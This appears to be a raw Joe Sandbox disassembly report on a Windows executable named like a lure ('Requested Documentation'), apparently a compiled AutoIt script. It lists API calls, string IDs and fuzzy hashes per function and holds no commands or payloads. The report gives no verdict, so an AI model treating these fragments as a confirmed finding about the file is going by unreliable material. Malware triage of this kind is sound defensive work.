                                                                              • Opcode Fuzzy Hash: 6985de8e5bf26b2d5965f5445f42d09d1ae76ce75bca3ea6d58f367489adfa77
                                                                              • Instruction Fuzzy Hash: 06317072900205EFCF10EFA5DC85AAEB778EF89310F1441A5F904AB246DB709E11DBA1
APIs
• DeleteObject.GDI32(00000000), ref: 00A061EB
• GetDC.USER32(00000000), ref: 00A061F3
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A061FE
• ReleaseDC.USER32(00000000,00000000), ref: 00A0620A
• CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00A06246
• SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00A06257
• MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00A0902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00A06291
• SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00A062B1
Memory Dump Source
• Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
Similarity
• API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
• String ID:
• API String ID: 3864802216-0
• Opcode ID: 1aeed73bc762a889b4978bdf79098edb2e1bdb601d0df11b893ecba243b0338b
• Instruction ID: 06c0c8ce03ce5eb486580e63714148d3e396daf7ec6fc56c745831f8f39b335c
• Opcode Fuzzy Hash: 1aeed73bc762a889b4978bdf79098edb2e1bdb601d0df11b893ecba243b0338b
• Instruction Fuzzy Hash: 9C314F72101218BFEF218F50DC8AFEA3BA9EF49765F044065FE08AA191D7759C52CB74
APIs
Memory Dump Source
• Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
Similarity
• API ID: _memcmp
• String ID:
• API String ID: 2931989736-0
• Opcode ID: 1d999651f4e050a66cd02f8c21c190d254a5af34acfc8737f382fe46c3be30aa
• Instruction ID: d226ec2d6661a0f6c98e605bd04233049185fcdd9b2e453ec30345ed04f11718
• Opcode Fuzzy Hash: 1d999651f4e050a66cd02f8c21c190d254a5af34acfc8737f382fe46c3be30aa
• Instruction Fuzzy Hash: DE21C261681205BBA6046A399D42FFB779CBF56388F058423FE0596743EB28DE2183E1
APIs
  • Part of subcall function 00989837: __itow.LIBCMT ref: 00989862
  • Part of subcall function 00989837: __swprintf.LIBCMT ref: 009898AC
  • Part of subcall function 0099FC86: _wcscpy.LIBCMT ref: 0099FCA9
• _wcstok.LIBCMT ref: 009EEC94
• _wcscpy.LIBCMT ref: 009EED23
• _memset.LIBCMT ref: 009EED56
Strings
Memory Dump Source
• Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
Similarity
• API ID: _wcscpy$__itow__swprintf_memset_wcstok
• String ID: X
• API String ID: 774024439-3081909835
• Opcode ID: 3e874151b6a7a0537f35b5cb878dc9da2f6787ae56131c39131bd5f41ce191b6
• Instruction ID: 6194d90e276ff66464c399ee35ea6ad6e9e57153aa2a11e2a920211b5d0106c1
• Opcode Fuzzy Hash: 3e874151b6a7a0537f35b5cb878dc9da2f6787ae56131c39131bd5f41ce191b6
• Instruction Fuzzy Hash: DDC16A716083419FC765EF64D881B6AB7E4BF85314F14492DF8999B3A2DB30EC45CB82
Memory Dump Source
• Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a723d84ecc6461508bf18a6cef5d0307611d894dc16745084e926ffd9664114b
• Instruction ID: 8499e55215c6239e187281d1102884fb46b9820271e1dcc5a25b3e4ff757e335
• Opcode Fuzzy Hash: a723d84ecc6461508bf18a6cef5d0307611d894dc16745084e926ffd9664114b
• Instruction Fuzzy Hash: 5A716F31900109EFDB14DFA8CC89EBEBB79FF85320F148159F915AA351C774AA52CB60
Memory Dump Source
• Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 36c79c91444af3da46abb21888f72c145b22ad979c1a9059269b5bdb74e84e0c
• Instruction ID: 6cfec27dc4038e5f91729b068464bcb316519b8153a5726f177ae517f4b340c6
• Opcode Fuzzy Hash: 36c79c91444af3da46abb21888f72c145b22ad979c1a9059269b5bdb74e84e0c
• Instruction Fuzzy Hash: 28618A72208304ABC710EB64CC86F7BB7A8AFD4714F54491DF6569B2E2DA70AD05CB92
APIs
• IsWindow.USER32(01356108), ref: 00A0B3EB
• IsWindowEnabled.USER32(01356108), ref: 00A0B3F7
• SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00A0B4DB
• SendMessageW.USER32(01356108,000000B0,?,?), ref: 00A0B512
• IsDlgButtonChecked.USER32(?,?), ref: 00A0B54F
• GetWindowLongW.USER32(01356108,000000EC), ref: 00A0B571
• SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00A0B589
Memory Dump Source
• Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
Similarity
• API ID: MessageSendWindow$ButtonCheckedEnabledLong
• String ID:
• API String ID: 4072528602-0
• Opcode ID: 3f083af7db40dc9bffd63d91bab2fd01faa7a8707e0b64c9ac75c4deb6b27931
• Instruction ID: 848cb78e872ad5b7055593a5cd6781b4a26b0d20c1f16c160038c97b6725cbd8
• Opcode Fuzzy Hash: 3f083af7db40dc9bffd63d91bab2fd01faa7a8707e0b64c9ac75c4deb6b27931
• Instruction Fuzzy Hash: 6D71A338610208EFDB20DF64EA94FBA77B5EF49300F144459FA45972E2C732AA41DB61
APIs
• _memset.LIBCMT ref: 009FF448
• _memset.LIBCMT ref: 009FF511
• ShellExecuteExW.SHELL32(?), ref: 009FF556
  • Part of subcall function 00989837: __itow.LIBCMT ref: 00989862
  • Part of subcall function 00989837: __swprintf.LIBCMT ref: 009898AC
  • Part of subcall function 0099FC86: _wcscpy.LIBCMT ref: 0099FCA9
• GetProcessId.KERNEL32(00000000), ref: 009FF5CD
• CloseHandle.KERNEL32(00000000), ref: 009FF5FC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
Similarity
• API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
• String ID: @
• API String ID: 3522835683-2766056989
• Opcode ID: b8a7aa09eb063b88e40a3f213b6a0942220ee8b84312da755b2bd0463a2b7bb5
• Instruction ID: be9c3d5f0e906dfd5f0a7f4cd2d60c723822095ff8da2706ee411039d801ed31
• Opcode Fuzzy Hash: b8a7aa09eb063b88e40a3f213b6a0942220ee8b84312da755b2bd0463a2b7bb5
• Instruction Fuzzy Hash: 6E619E75A006199FCF14EFA4C495ABEBBF5FF89314F148069E855AB351CB30AD41CB90
APIs
• GetParent.USER32(?), ref: 009E0F8C
• GetKeyboardState.USER32(?), ref: 009E0FA1
• SetKeyboardState.USER32(?), ref: 009E1002
• PostMessageW.USER32(?,00000101,00000010,?), ref: 009E1030
• PostMessageW.USER32(?,00000101,00000011,?), ref: 009E104F
• PostMessageW.USER32(?,00000101,00000012,?), ref: 009E1095
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 009E10B8
Memory Dump Source
• Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: 8e3f2897d61d64b3920656a662a63aadf289cee8e16fbcfe2264ac9a740fde02
• Instruction ID: ee8b4483283e05761b1dc135c6edcb5248b19e9d4a91b011742a7e1ab079673d
• Opcode Fuzzy Hash: 8e3f2897d61d64b3920656a662a63aadf289cee8e16fbcfe2264ac9a740fde02
• Instruction Fuzzy Hash: 1F5113B06087D53EFB3742358C15BBABEAD6B46300F088989E1D4968D3C2E9ECD9D751
APIs
• GetParent.USER32(00000000), ref: 009E0DA5
• GetKeyboardState.USER32(?), ref: 009E0DBA
• SetKeyboardState.USER32(?), ref: 009E0E1B
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 009E0E47
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 009E0E64
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 009E0EA8
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 009E0EC9
Memory Dump Source
• Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: f443a157030e1ad2fabbcf25d345e2c9efcf53288511a42a197be4d283665849
• Instruction ID: 361c62d8f51a6c4e10b209c8f56a59c8cfdfed684b5fe81a498e0378910e9824
• Opcode Fuzzy Hash: f443a157030e1ad2fabbcf25d345e2c9efcf53288511a42a197be4d283665849
• Instruction Fuzzy Hash: E55102A05087D53DFB3383768C45B7ABEAD6B86300F08899DE1D8568C2C3E5ACD9D760
APIs
Memory Dump Source
• Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
Similarity
• API ID: _wcsncpy$LocalTime
• String ID:
• API String ID: 2945705084-0
• Opcode ID: 1eab5a9e11308f9f5e69d4b928d2339ae827a7b710b970c77409af0de9d089b6
• Instruction ID: 854e42d2e01ead5c9e9e1b46c5fceb19c35e482e5eec322fc36a2c056ba59942
• Opcode Fuzzy Hash: 1eab5a9e11308f9f5e69d4b928d2339ae827a7b710b970c77409af0de9d089b6
• Instruction Fuzzy Hash: 1741A465C1065476CB12EBB88C46BCFB3BC9F86310F508956F508E3221EB34E655C7E6
                                                                              APIs
                                                                                • Part of subcall function 009E466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,009E3697,?), ref: 009E468B
                                                                                • Part of subcall function 009E466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,009E3697,?), ref: 009E46A4
                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 009E36B7
                                                                              • _wcscmp.LIBCMT ref: 009E36D3
                                                                              • MoveFileW.KERNEL32(?,?), ref: 009E36EB
                                                                              • _wcscat.LIBCMT ref: 009E3733
                                                                              • SHFileOperationW.SHELL32(?), ref: 009E379F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              Similarity
                                                                              • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                              • String ID: \*.*
                                                                              • API String ID: 1377345388-1173974218
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00A072AA
                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A07351
                                                                              • IsMenu.USER32(?), ref: 00A07369
                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00A073B1
                                                                              • DrawMenuBar.USER32 ref: 00A073C4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              Similarity
                                                                              • API ID: Menu$Item$DrawInfoInsert_memset
                                                                              • String ID: 0
                                                                              • API String ID: 3866635326-4108050209
                                                                              APIs
                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00A00FD4
                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A00FFE
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00A010B5
                                                                                • Part of subcall function 00A00FA5: RegCloseKey.ADVAPI32(?), ref: 00A0101B
                                                                                • Part of subcall function 00A00FA5: FreeLibrary.KERNEL32(?), ref: 00A0106D
                                                                                • Part of subcall function 00A00FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00A01090
                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00A01058
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              Similarity
                                                                              • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                              • String ID:
                                                                              • API String ID: 395352322-0
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00A062EC
                                                                              • GetWindowLongW.USER32(01356108,000000F0), ref: 00A0631F
                                                                              • GetWindowLongW.USER32(01356108,000000F0), ref: 00A06354
                                                                              • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00A06386
                                                                              • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00A063B0
                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00A063C1
                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00A063DB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              Similarity
                                                                              • API ID: LongWindow$MessageSend
                                                                              • String ID:
                                                                              • API String ID: 2178440468-0
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009DDB2E
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009DDB54
                                                                              • SysAllocString.OLEAUT32(00000000), ref: 009DDB57
                                                                              • SysAllocString.OLEAUT32(?), ref: 009DDB75
                                                                              • SysFreeString.OLEAUT32(?), ref: 009DDB7E
                                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 009DDBA3
                                                                              • SysAllocString.OLEAUT32(?), ref: 009DDBB1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              Similarity
                                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                              • String ID:
                                                                              • API String ID: 3761583154-0
                                                                              APIs
                                                                                • Part of subcall function 009F7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 009F7DB6
                                                                              • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 009F61C6
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 009F61D5
                                                                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 009F620E
                                                                              • connect.WSOCK32(00000000,?,00000010), ref: 009F6217
                                                                              • WSAGetLastError.WSOCK32 ref: 009F6221
                                                                              • closesocket.WSOCK32(00000000), ref: 009F624A
                                                                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 009F6263
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              Similarity
                                                                              • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                              • String ID:
                                                                              • API String ID: 910771015-0
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              Similarity
                                                                              • API ID: __wcsnicmp
                                                                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                              • API String ID: 1038674560-2734436370
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009DDC09
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009DDC2F
                                                                              • SysAllocString.OLEAUT32(00000000), ref: 009DDC32
                                                                              • SysAllocString.OLEAUT32 ref: 009DDC53
                                                                              • SysFreeString.OLEAUT32 ref: 009DDC5C
                                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 009DDC76
                                                                              • SysAllocString.OLEAUT32(?), ref: 009DDC84
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              Similarity
                                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                              • String ID:
                                                                              • API String ID: 3761583154-0
                                                                              APIs
                                                                                • Part of subcall function 00981D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00981D73
                                                                                • Part of subcall function 00981D35: GetStockObject.GDI32(00000011), ref: 00981D87
                                                                                • Part of subcall function 00981D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00981D91
                                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00A07632
                                                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00A0763F
                                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00A0764A
                                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00A07659
                                                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00A07665
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              Similarity
                                                                              • API ID: MessageSend$CreateObjectStockWindow
                                                                              • String ID: Msctls_Progress32
                                                                              • API String ID: 1025951953-3636473452
                                                                              APIs
                                                                              • __init_pointers.LIBCMT ref: 009A9AE6
                                                                                • Part of subcall function 009A3187: EncodePointer.KERNEL32(00000000), ref: 009A318A
                                                                                • Part of subcall function 009A3187: __initp_misc_winsig.LIBCMT ref: 009A31A5
                                                                                • Part of subcall function 009A3187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 009A9EA0
                                                                                • Part of subcall function 009A3187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 009A9EB4
                                                                                • Part of subcall function 009A3187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 009A9EC7
                                                                                • Part of subcall function 009A3187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 009A9EDA
                                                                                • Part of subcall function 009A3187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 009A9EED
                                                                                • Part of subcall function 009A3187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 009A9F00
                                                                                • Part of subcall function 009A3187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 009A9F13
                                                                                • Part of subcall function 009A3187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 009A9F26
                                                                                • Part of subcall function 009A3187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 009A9F39
                                                                                • Part of subcall function 009A3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 009A9F4C
                                                                                • Part of subcall function 009A3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 009A9F5F
                                                                                • Part of subcall function 009A3187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 009A9F72
                                                                                • Part of subcall function 009A3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 009A9F85
                                                                                • Part of subcall function 009A3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 009A9F98
                                                                                • Part of subcall function 009A3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 009A9FAB
                                                                                • Part of subcall function 009A3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 009A9FBE
                                                                              • __mtinitlocks.LIBCMT ref: 009A9AEB
                                                                              • __mtterm.LIBCMT ref: 009A9AF4
                                                                                • Part of subcall function 009A9B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,009A9AF9,009A7CD0,00A3A0B8,00000014), ref: 009A9C56
                                                                                • Part of subcall function 009A9B5C: _free.LIBCMT ref: 009A9C5D
                                                                                • Part of subcall function 009A9B5C: DeleteCriticalSection.KERNEL32(00A3EC00,?,?,009A9AF9,009A7CD0,00A3A0B8,00000014), ref: 009A9C7F
                                                                              • __calloc_crt.LIBCMT ref: 009A9B19
                                                                              • __initptd.LIBCMT ref: 009A9B3B
                                                                              • GetCurrentThreadId.KERNEL32 ref: 009A9B42
                                                                              Similarity
                                                                              • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                              • String ID:
                                                                              • API String ID: 3567560977-0
                                                                              • Opcode ID: 4e68ab628719ef99ea974f14f55b273d11822f3ea8b42eaee06f3f58d3f99d74
                                                                              • Instruction ID: 41112344e06cd1644b03d20f486d60084fe01b4f4ee607b3c3f5e4ec349d7002
                                                                              • Opcode Fuzzy Hash: 4e68ab628719ef99ea974f14f55b273d11822f3ea8b42eaee06f3f58d3f99d74
                                                                              • Instruction Fuzzy Hash: CDF090325097115AE734B7B8BC0374B3694FF83734F214A1AF461D90D2EF20844245E0
                                                                              APIs
                                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,009A3F85), ref: 009A4085
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 009A408C
                                                                              • EncodePointer.KERNEL32(00000000), ref: 009A4097
                                                                              • DecodePointer.KERNEL32(009A3F85), ref: 009A40B2
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                              • String ID: RoUninitialize$combase.dll
                                                                              • API String ID: 3489934621-2819208100
                                                                              • Opcode ID: 450b80197adc2a70d8e0d02f5f6dd2c65563afc0c92ad75cdf772da7cbef1ca5
                                                                              • Instruction ID: dd391f3791804ac7820e8efde6342e51222025ef4cae1e56fa2d1274149cd1d2
                                                                              • Opcode Fuzzy Hash: 450b80197adc2a70d8e0d02f5f6dd2c65563afc0c92ad75cdf772da7cbef1ca5
                                                                              • Instruction Fuzzy Hash: 6EE09279581304EFEF60EFE5EC0EB453AA8BB86742F104625F511E54A0CBB786439B15
                                                                              APIs
                                                                              Similarity
                                                                              • API ID: _memmove$__itow__swprintf
                                                                              • String ID:
                                                                              • API String ID: 3253778849-0
                                                                              • Opcode ID: 5a0511546f6356c8d5db77ac67a7c16c4155dfc06aa98caf02874be13bd27149
                                                                              • Instruction ID: 334f35936cecfd99a4354da40a78f76eb06ec5c358e6cdf4aa38a44516ed230f
                                                                              • Opcode Fuzzy Hash: 5a0511546f6356c8d5db77ac67a7c16c4155dfc06aa98caf02874be13bd27149
                                                                              • Instruction Fuzzy Hash: 09619B3050028A9BCF02FF65CC82BFE37A9AF95708F084919F8595B292DB35ED05DB90
                                                                              APIs
                                                                                • Part of subcall function 00987DE1: _memmove.LIBCMT ref: 00987E22
                                                                                • Part of subcall function 00A00E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,009FFDAD,?,?), ref: 00A00E31
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A002BD
                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A002FD
                                                                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00A00320
                                                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00A00349
                                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00A0038C
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00A00399
                                                                              Similarity
                                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                              • String ID:
                                                                              • API String ID: 4046560759-0
